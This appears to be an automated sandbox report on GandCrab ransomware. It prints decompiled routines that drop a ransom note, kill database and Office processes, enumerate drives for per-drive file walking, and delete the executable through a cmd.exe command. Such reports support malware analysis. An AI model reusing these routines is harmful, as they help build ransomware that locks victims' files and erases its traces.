                                        • API ID: lstrlen
                                        • String ID:
                                        • API String ID: 1659193697-0
                                        • Opcode ID: 6a88eac016091fd40f4fac5fda2f6562c290ef44477970f82424d7ea23117100
                                        • Instruction ID: 9d68a9b8f781679658be0a54c2da7e352ce35ebdcfacee7124517a2674326a03
                                        • Opcode Fuzzy Hash: 6a88eac016091fd40f4fac5fda2f6562c290ef44477970f82424d7ea23117100
                                        • Instruction Fuzzy Hash: 04413032101652EFD7125FB8DE8C794BBA1FF04326F188534E51682A62D775B8B8DF81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			// Maps the running executable (GetModuleFileNameW -> CreateFileW -> CreateFileMappingW ->
                                        			// MapViewOfFile), takes the ANSI string stored at file offset 0x4e (inside the DOS header/stub
                                        			// region) and appends it to the wide string at __ecx, widening each byte to UTF-16 by
                                        			// interleaving zero bytes. All handles and the path buffer are released before returning.
                                        			E0F9D53A0(WCHAR* __ecx) {
                                        				CHAR* _v8;
                                        				void* _v12;
                                        				void* _v16;
                                        				void* _v20;
                                        				void* _v24;
                                        				void* _t22;
                                        				void* _t24;
                                        				signed int _t26;
                                        				int _t30;
                                        				char _t32;
                                        				void* _t33;
                                        				signed char _t34;
                                        				CHAR* _t36;
                                        				WCHAR* _t37;
                                        				WCHAR* _t38;
                                        				void* _t39;
                                        				CHAR* _t40;
                                        
                                        				_t37 = __ecx;
                                        				_t39 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
                                        				_v20 = _t39;
                                        				GetModuleFileNameW(0, _t39, 0x200);
                                        				_t33 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0x80, 0);
                                        				_v16 = _t33;
                                        				if(_t33 != 0xffffffff) {
                                        					_t22 = CreateFileMappingW(_t33, 0, 8, 0, 0, 0);
                                        					_v24 = _t22;
                                        					if(_t22 != 0) {
                                        						_t24 = MapViewOfFile(_t22, 1, 0, 0, 0);
                                        						_v12 = _t24;
                                        						if(_t24 != 0) {
                                        							_t5 = _t24 + 0x4e; // 0x4e
                                        							_t40 = _t5;
                                        							_v8 = _t40;
                                        							_t26 = lstrlenW(_t37);
                                        							_t34 = 0;
                                        							_t38 =  &(_t37[_t26]);
                                        							if(lstrlenA(_t40) + _t27 != 0) {
                                        								_t36 = _t40;
                                        								do {
                                        									if((_t34 & 0x00000001) != 0) {
                                        										 *((char*)(_t38 + _t34)) = 0;
                                        									} else {
                                        										_t32 =  *_t40;
                                        										_t40 =  &(_t40[1]);
                                        										 *((char*)(_t38 + _t34)) = _t32;
                                        									}
                                        									_t34 = _t34 + 1;
                                        									_t30 = lstrlenA(_t36);
                                        									_t36 = _v8;
                                        								} while (_t34 < _t30 + _t30);
                                        							}
                                        							UnmapViewOfFile(_v12);
                                        							_t33 = _v16;
                                        							_t39 = _v20;
                                        						}
                                        						CloseHandle(_v24);
                                        					}
                                        					CloseHandle(_t33);
                                        				}
                                        				return VirtualFree(_t39, 0, 0x8000);
                                        			}

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000404,00003000,00000040,00000000,74CF81D0,00000000,?,?,?,?,0F9D55B2), ref: 0F9D53B9
                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,0F9D55B2), ref: 0F9D53CC
                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,0F9D55B2), ref: 0F9D53E5
                                        • CreateFileMappingW.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000,?,?,?,?,0F9D55B2), ref: 0F9D5404
                                        • MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,0F9D55B2), ref: 0F9D541A
                                        • lstrlenW.KERNEL32(?,?,?,?,?,0F9D55B2), ref: 0F9D542E
                                        • lstrlenA.KERNEL32(0000004E,?,?,?,?,0F9D55B2), ref: 0F9D543A
                                        • lstrlenA.KERNEL32(0000004E,?,?,?,?,0F9D55B2), ref: 0F9D5459
                                        • UnmapViewOfFile.KERNEL32(?,?,?,?,?,0F9D55B2), ref: 0F9D546B
                                        • CloseHandle.KERNEL32(?,?,?,?,?,0F9D55B2), ref: 0F9D547A
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,0F9D55B2), ref: 0F9D5481
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,0F9D55B2), ref: 0F9D548F
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$lstrlen$CloseCreateHandleViewVirtual$AllocFreeMappingModuleNameUnmap
                                        • String ID:
                                        • API String ID: 869890170-0
                                        • Opcode ID: 91f8594f7e53ff3347cc5327525c73afad142cb364c1f65c698b8143711735c8
                                        • Instruction ID: 0a4ec33140be44d973fc6aebe2ad37e932ed4cd16b21a66ecc3e5b17ab2045a9
                                        • Opcode Fuzzy Hash: 91f8594f7e53ff3347cc5327525c73afad142cb364c1f65c698b8143711735c8
                                        • Instruction Fuzzy Hash: 2B31F670645315BBF7304FA49C4AF9D7B6CAF05B12F348014F701BA1C2CAB8A5608B69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			// Drops the ransom note "GDCB-DECRYPT.txt" into the directory whose path arrives in _t21:
                                        			// CreateFileW with dwCreationDisposition 1 (CREATE_NEW), then WriteFile of the global wide
                                        			// string at 0xf9e2a64. Returns 1 on success or when the note already exists
                                        			// (GetLastError() == 0xb7, ERROR_ALREADY_EXISTS), otherwise 0.
                                        			E0F9D6BE0(void* __ecx) {
                                        				long _v8;
                                        				WCHAR* _t7;
                                        				signed int _t16;
                                        				void* _t21;
                                        				void* _t22;
                                        				void* _t25;
                                        
                                        				_t25 = VirtualAlloc(0, 0x402, 0x3000, 0x40);
                                        				wsprintfW(_t25, L"%s\\GDCB-DECRYPT.txt", _t21);
                                        				_t22 = CreateFileW(_t25, 0x40000000, 0, 0, 1, 0x80, 0);
                                        				if(_t22 != 0xffffffff) {
                                        					_t7 =  *0xf9e2a64; // 0x1f2000
                                        					if(_t7 != 0) {
                                        						WriteFile(_t22,  *0xf9e2a64, lstrlenW(_t7) + _t11,  &_v8, 0);
                                        					}
                                        					CloseHandle(_t22);
                                        					_t16 = 1;
                                        				} else {
                                        					_t16 = 0 | GetLastError() == 0x000000b7;
                                        				}
                                        				VirtualFree(_t25, 0, 0x8000);
                                        				return _t16;
                                        			}

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0F9D6CC2,00000000,?,?), ref: 0F9D6BF5
                                        • wsprintfW.USER32 ref: 0F9D6C03
                                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0F9D6C1F
                                        • GetLastError.KERNEL32(?,?), ref: 0F9D6C2C
                                        • lstrlenW.KERNEL32(001F2000,?,00000000,?,?), ref: 0F9D6C4E
                                        • WriteFile.KERNEL32(00000000,00000000,?,?), ref: 0F9D6C5E
                                        • CloseHandle.KERNEL32(00000000,?,?), ref: 0F9D6C65
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F9D6C78
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileVirtual$AllocCloseCreateErrorFreeHandleLastWritelstrlenwsprintf
                                        • String ID: %s\GDCB-DECRYPT.txt
                                        • API String ID: 2985722263-4054134092
                                        • Opcode ID: 61ecc08a0d74ff2eb05ea93f08ce3620796b9f9efbc6721815f43839a10bb89a
                                        • Instruction ID: 528289e7129729d578782d09b17d4617148ebba06c88b738be64b4aae6f39272
                                        • Opcode Fuzzy Hash: 61ecc08a0d74ff2eb05ea93f08ce3620796b9f9efbc6721815f43839a10bb89a
                                        • Instruction Fuzzy Hash: DB01B5753493107BF2301B74ED4BF6A3A6CDB46B66F304114FB05E91C2DBA869708669
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			// Self-deletion and exit: resolves its own module path, hands cmd.exe the command line
                                        			// shown below via ShellExecuteW so the executable is deleted after a delay, then calls
                                        			// ExitProcess(0) so the file is no longer in use when the delete runs.
                                        			E0F9D5190() {
                                        				WCHAR* _t6;
                                        				short* _t8;
                                        
                                        				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                        				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                        				if(_t6 != 0) {
                                        					GetModuleFileNameW(0, _t6, 0x200);
                                        					if(_t8 != 0) {
                                        						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
                                        						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0);
                                        					}
                                        				}
                                        				ExitProcess(0);
                                        			}

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0F9D5392,00000000), ref: 0F9D51A6
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F9D51B8
                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 0F9D51C8
                                        • wsprintfW.USER32 ref: 0F9D51D9
                                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0F9D51F3
                                        • ExitProcess.KERNEL32 ref: 0F9D51FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
                                        • String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
                                        • API String ID: 4033023619-516011104
                                        • Opcode ID: 88e0d11951383276035ca72d3f631ed8fe3de7c76dbd2aee08c05eca70f6a8ca
                                        • Instruction ID: 223ed9f4fdf2b1c67bcc8898d83174796d0f3b6891c94885c78c505186383b75
                                        • Opcode Fuzzy Hash: 88e0d11951383276035ca72d3f631ed8fe3de7c76dbd2aee08c05eca70f6a8ca
                                        • Instruction Fuzzy Hash: 35F030327C632177F13116655C0FF072D2C9B85F2AF398004F709BE1C389E8656086A9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 98%
                                        			E0F9D46F0() {
                                        				char* _v12;
                                        				char* _v16;
                                        				char* _v20;
                                        				char* _v24;
                                        				char* _v28;
                                        				char* _v32;
                                        				char* _v36;
                                        				char* _v40;
                                        				char* _v44;
                                        				char* _v48;
                                        				char* _v52;
                                        				char* _v56;
                                        				char* _v60;
                                        				char* _v64;
                                        				char* _v68;
                                        				char* _v72;
                                        				char* _v76;
                                        				char* _v80;
                                        				char* _v84;
                                        				char* _v88;
                                        				char* _v92;
                                        				char* _v96;
                                        				char* _v100;
                                        				char* _v104;
                                        				char* _v108;
                                        				char* _v112;
                                        				char* _v116;
                                        				char* _v120;
                                        				char* _v124;
                                        				char* _v128;
                                        				char* _v132;
                                        				char* _v136;
                                        				char* _v140;
                                        				char* _v144;
                                        				char* _v148;
                                        				char* _v152;
                                        				char* _v156;
                                        				char* _v160;
                                        				char* _v164;
                                        				void* _v172;
                                        				int _t51;
                                        				int _t52;
                                        				void* _t60;
                                        				WCHAR* _t62;
                                        				void* _t65;
                                        				void* _t70;
                                        				signed int _t71;
                                        				void* _t72;
                                        				signed int _t74;
                                        				void* _t76;
                                        
                                        				_t76 = (_t74 & 0xfffffff8) - 0xa4;
                                        				_v164 = L"msftesql.exe";
                                        				_v160 = L"sqlagent.exe";
                                        				_v156 = L"sqlbrowser.exe";
                                        				_v152 = L"sqlservr.exe";
                                        				_v148 = L"sqlwriter.exe";
                                        				_v144 = L"oracle.exe";
                                        				_v140 = L"ocssd.exe";
                                        				_v136 = L"dbsnmp.exe";
                                        				_v132 = L"synctime.exe";
                                        				_v128 = L"mydesktopqos.exe";
                                        				_v124 = L"agntsvc.exeisqlplussvc.exe";
                                        				_v120 = L"xfssvccon.exe";
                                        				_v116 = L"mydesktopservice.exe";
                                        				_v112 = L"ocautoupds.exe";
                                        				_v108 = L"agntsvc.exeagntsvc.exe";
                                        				_v104 = L"agntsvc.exeencsvc.exe";
                                        				_v100 = L"firefoxconfig.exe";
                                        				_v96 = L"tbirdconfig.exe";
                                        				_v92 = L"ocomm.exe";
                                        				_v88 = L"mysqld.exe";
                                        				_v84 = L"mysqld-nt.exe";
                                        				_v80 = L"mysqld-opt.exe";
                                        				_v76 = L"dbeng50.exe";
                                        				_v72 = L"sqbcoreservice.exe";
                                        				_v68 = L"excel.exe";
                                        				_v64 = L"infopath.exe";
                                        				_v60 = L"msaccess.exe";
                                        				_v56 = L"mspub.exe";
                                        				_v52 = L"onenote.exe";
                                        				_v48 = L"outlook.exe";
                                        				_v44 = L"powerpnt.exe";
                                        				_v40 = L"steam.exe";
                                        				_v36 = L"sqlservr.exe";
                                        				_v32 = L"thebat.exe";
                                        				_v28 = L"thebat64.exe";
                                        				_v24 = L"thunderbird.exe";
                                        				_v20 = L"visio.exe";
                                        				_v16 = L"winword.exe";
                                        				_v12 = L"wordpad.exe";
                                        				_t70 = CreateToolhelp32Snapshot(2, 0);
                                        				_v172 = _t70;
                                        				_t60 = VirtualAlloc(0, 0x22c, 0x3000, 4);
                                        				if(_t60 != 0) {
                                        					 *_t60 = 0x22c;
                                        					if(_t70 != 0xffffffff) {
                                        						_push(_t60);
                                        						Process32FirstW(_t70);
                                        					}
                                        				}
                                        				_t41 = _t60 + 0x24; // 0x24
                                        				_t62 = _t41;
                                        				do {
                                        					_t71 = 0;
                                        					do {
                                        						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
                                        						if(_t51 == 0) {
                                        							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
                                        							if(_t65 != 0) {
                                        								TerminateProcess(_t65, 0);
                                        								CloseHandle(_t65);
                                        							}
                                        						}
                                        						_t71 = _t71 + 1;
                                        						_t46 = _t60 + 0x24; // 0x24
                                        						_t62 = _t46;
                                        					} while (_t71 < 0x27);
                                        					_t72 = _v172;
                                        					_t52 = Process32NextW(_t72, _t60);
                                        					_t48 = _t60 + 0x24; // 0x24
                                        					_t62 = _t48;
                                        				} while (_t52 != 0);
                                        				if(_t60 != 0) {
                                        					VirtualFree(_t60, 0, 0x8000);
                                        				}
                                        				return CloseHandle(_t72);
                                        			}

                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0F9D4862
                                        • VirtualAlloc.KERNEL32(00000000,0000022C,00003000,00000004), ref: 0F9D487C
                                        • Process32FirstW.KERNEL32(00000000,00000000), ref: 0F9D4895
                                        • lstrcmpiW.KERNEL32(00000002,00000024), ref: 0F9D48B5
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0F9D48C5
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0F9D48D4
                                        • CloseHandle.KERNEL32(00000000), ref: 0F9D48E1
                                        • Process32NextW.KERNEL32(?,00000000), ref: 0F9D48FA
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D4913
                                        • CloseHandle.KERNEL32(?), ref: 0F9D491A
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleProcessProcess32Virtual$AllocCreateFirstFreeNextOpenSnapshotTerminateToolhelp32lstrcmpi
                                        • String ID:
                                        • API String ID: 3586910739-0
                                        • Opcode ID: 0a5af32f8358616a82d5ff002e8cd54016a2d25783bc7eea241d44a294886b9a
                                        • Instruction ID: 622c47e7eb27b7a4fbf34b5b108a8eb5cf91bffc6efc84e014208d04cd5bcbec
                                        • Opcode Fuzzy Hash: 0a5af32f8358616a82d5ff002e8cd54016a2d25783bc7eea241d44a294886b9a
                                        • Instruction Fuzzy Hash: FC5158B41093849FD7208F14984A75ABBE8BB8271CF70C91CF59A5B2D2C7788919CF96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E0F9D2C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                        				struct tagPAINTSTRUCT _v68;
                                        				struct tagPAINTSTRUCT _v88;
                                        				short _v100;
                                        				intOrPtr _t13;
                                        				void* _t15;
                                        				struct HDC__* _t21;
                                        				int _t30;
                                        
                                        				_t13 =  *0xf9df290; // 0x21
                                        				asm("movdqu xmm0, [0xf9df280]");
                                        				_t30 = _a8;
                                        				_v88.fErase = _t13;
                                        				asm("movdqu [esp+0x10], xmm0");
                                        				_t15 = _t30 - 2;
                                        				if(_t15 == 0) {
                                        					CreateThread(0, 0, E0F9D2AD0, 0, 0, 0);
                                        					DestroyWindow(_a4);
                                        					return 0xdeadbeef;
                                        				} else {
                                        					if(_t15 == 0xd) {
                                        						_t21 = BeginPaint(_a4,  &_v68);
                                        						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100));
                                        						EndPaint(_a4,  &_v88);
                                        						return 0;
                                        					} else {
                                        						return DefWindowProcW(_a4, _t30, _a12, _a16);
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • DefWindowProcW.USER32(?,?,?,?), ref: 0F9D2C8A
                                        • BeginPaint.USER32(?,?), ref: 0F9D2C9F
                                        • lstrlenW.KERNEL32(?), ref: 0F9D2CAC
                                        • TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 0F9D2CBD
                                        • EndPaint.USER32(?,?), ref: 0F9D2CCB
                                        • CreateThread.KERNEL32 ref: 0F9D2CE9
                                        • DestroyWindow.USER32(?), ref: 0F9D2CF2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
                                        • String ID: GandCrab!
                                        • API String ID: 572880375-2223329875
                                        • Opcode ID: 37131f888b245359eec163c406be56ffa05b4ec09fdb5c0783ae18a439822bf6
                                        • Instruction ID: 5335b077f8efd42d98b3f5f631aed1602a0c00fb5ca3b4ea69f0767a9b87d3e7
                                        • Opcode Fuzzy Hash: 37131f888b245359eec163c406be56ffa05b4ec09fdb5c0783ae18a439822bf6
                                        • Instruction Fuzzy Hash: 5B11C832109309AFE721DF64DC0AFAA7B6CFB49322F104616FE41D6191E7719970CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E0F9D3E20(struct _SECURITY_ATTRIBUTES* __ecx) {
                                        				char _v612;
                                        				char _v644;
                                        				void* _v908;
                                        				void* _v912;
                                        				intOrPtr _v916;
                                        				intOrPtr _v920;
                                        				short _v924;
                                        				signed int _v928;
                                        				void* _v932;
                                        				void* _v936;
                                        				intOrPtr _v940;
                                        				intOrPtr _v944;
                                        				intOrPtr _v948;
                                        				long _v952;
                                        				struct _SECURITY_ATTRIBUTES* _v956;
                                        				struct _SECURITY_ATTRIBUTES* _v960;
                                        				struct _SECURITY_ATTRIBUTES* _v964;
                                        				char _v968;
                                        				void* _t67;
                                        				short _t68;
                                        				intOrPtr _t69;
                                        				int _t72;
                                        				long _t75;
                                        				signed int _t77;
                                        				signed int _t80;
                                        				intOrPtr* _t82;
                                        				void* _t84;
                                        				struct _SECURITY_ATTRIBUTES* _t87;
                                        				long _t88;
                                        				intOrPtr _t89;
                                        				intOrPtr _t92;
                                        				intOrPtr _t95;
                                        				char _t101;
                                        				intOrPtr _t106;
                                        				void _t110;
                                        				struct _SECURITY_ATTRIBUTES** _t114;
                                        				intOrPtr _t115;
                                        				signed int _t119;
                                        				void* _t121;
                                        
                                        				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
                                        				_t87 = __ecx;
                                        				_v964 = __ecx;
                                        				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
                                        				 *((intOrPtr*)(_t67 + 4)) = _t87;
                                        				_t88 = 0;
                                        				 *_t67 = 0x43;
                                        				_t68 =  *L"?:\\"; // 0x3a003f
                                        				_v924 = _t68;
                                        				_t69 =  *0xf9df348; // 0x5c
                                        				_v920 = _t69;
                                        				_v968 = GetTickCount();
                                        				_t114 =  &_v644;
                                        				_t110 = 0x41;
                                        				do {
                                        					_v924 = _t110;
                                        					_t72 = GetDriveTypeW( &_v924);
                                        					if(_t72 >= 2 && _t72 != 5) {
                                        						 *((intOrPtr*)(_t114 - 4)) = _v964;
                                        						_t84 = _t114 - 8;
                                        						 *_t84 = _t110;
                                        						 *_t114 = 0;
                                        						_t114[2] = 0;
                                        						_t114[3] = 0;
                                        						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E0F9D6DE0, _t84, 0, 0);
                                        						_t88 = _t88 + 1;
                                        						_t114 =  &(_t114[6]);
                                        					}
                                        					_t110 = _t110 + 1;
                                        				} while (_t110 <= 0x5a);
                                        				_v952 = _t88;
                                        				asm("xorps xmm0, xmm0");
                                        				_v956 = 0;
                                        				_v960 = 0;
                                        				asm("movlpd [esp+0x38], xmm0");
                                        				asm("movlpd [esp+0x30], xmm0");
                                        				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
                                        				_t75 = GetTickCount();
                                        				asm("xorps xmm0, xmm0");
                                        				_t115 = _v948;
                                        				_v932 = _t75 - _v968;
                                        				_t77 = 0;
                                        				_v964 = 0;
                                        				asm("movlpd [esp+0x40], xmm0");
                                        				if(_t88 < 2) {
                                        					_t95 = _v940;
                                        					_t106 = _v944;
                                        				} else {
                                        					_t26 = _t88 - 2; // -1
                                        					_t92 = _v940;
                                        					_t82 =  &_v612;
                                        					_t101 = (_t26 >> 1) + 1;
                                        					_v968 = _t101;
                                        					_v928 = _t101 + _t101;
                                        					_t106 = _v944;
                                        					do {
                                        						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
                                        						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
                                        						asm("adc edi, [eax-0x14]");
                                        						_t115 = _t115 +  *_t82;
                                        						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
                                        						asm("adc edx, [eax+0x4]");
                                        						_t82 = _t82 + 0x30;
                                        						_t41 =  &_v968;
                                        						 *_t41 = _v968 - 1;
                                        					} while ( *_t41 != 0);
                                        					_t77 = _v928;
                                        					_v968 = _t92;
                                        					_t88 = _v952;
                                        					_t95 = _v968;
                                        				}
                                        				if(_t77 >= _t88) {
                                        					_t89 = _v916;
                                        				} else {
                                        					_t80 = _t77 + _t77 * 2;
                                        					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
                                        					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
                                        				}
                                        				asm("adc edx, edi");
                                        				asm("adc edx, eax");
                                        				return E0F9D5670(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
			}

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 0F9D3E40
                                        • GetTickCount.KERNEL32 ref: 0F9D3E65
                                        • GetDriveTypeW.KERNEL32(?), ref: 0F9D3E8A
                                        • CreateThread.KERNEL32 ref: 0F9D3EC9
                                        • WaitForMultipleObjects.KERNEL32(00000000,?), ref: 0F9D3F0B
                                        • GetTickCount.KERNEL32 ref: 0F9D3F11
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
• Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
• Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
                                        • String ID: ?:\
                                        • API String ID: 458387131-2533537817
                                        • Opcode ID: 3a4fa261f6d0bd4c2573b3026b0b23293ec2b0217c32a9afa2f6273347b0dd7d
                                        • Instruction ID: e9248d09911c0c3f7bf8714baa41f22062386ceb83a21cd3c161bb01fd57d192
                                        • Opcode Fuzzy Hash: 3a4fa261f6d0bd4c2573b3026b0b23293ec2b0217c32a9afa2f6273347b0dd7d
                                        • Instruction Fuzzy Hash: D05136709093009FD310CF18D888B5AFBE5FF89325F608A2DF58997391D375A954CB96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0F9D6DE0(void* _a4) {
                                        				intOrPtr _v0;
                                        				intOrPtr _v4;
                                        				long _v8;
                                        				intOrPtr _v12;
                                        				void* _v16;
                                        				struct _CRITICAL_SECTION _v40;
                                        				WCHAR* _t12;
                                        				void* _t22;
                                        
                                        				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
                                        				_t22 = _a4;
                                        				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
                                        				InitializeCriticalSection( &_v40);
                                        				_v12 = 0x2710;
                                        				_v8 = 0;
                                        				_v4 = 0xffffffff;
                                        				_v0 = 0xffffffff;
                                        				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
                                        				E0F9D6C90(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
                                        				VirtualFree(_t22, 0, 0x8000);
                                        				ExitThread(0);
			}

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 0F9D6DF9
                                        • wsprintfW.USER32 ref: 0F9D6E0E
                                        • InitializeCriticalSection.KERNEL32(?), ref: 0F9D6E1C
                                        • VirtualAlloc.KERNEL32 ref: 0F9D6E50
                                          • Part of subcall function 0F9D6C90: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F9D6CC3
                                          • Part of subcall function 0F9D6C90: lstrcatW.KERNEL32(00000000,0F9DFEC4), ref: 0F9D6CDB
                                          • Part of subcall function 0F9D6C90: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F9D6CE5
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 0F9D6E7B
                                        • ExitThread.KERNEL32 ref: 0F9D6E83
                                        Strings
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
                                        • String ID: %c:\
                                        • API String ID: 1988002015-3142399695
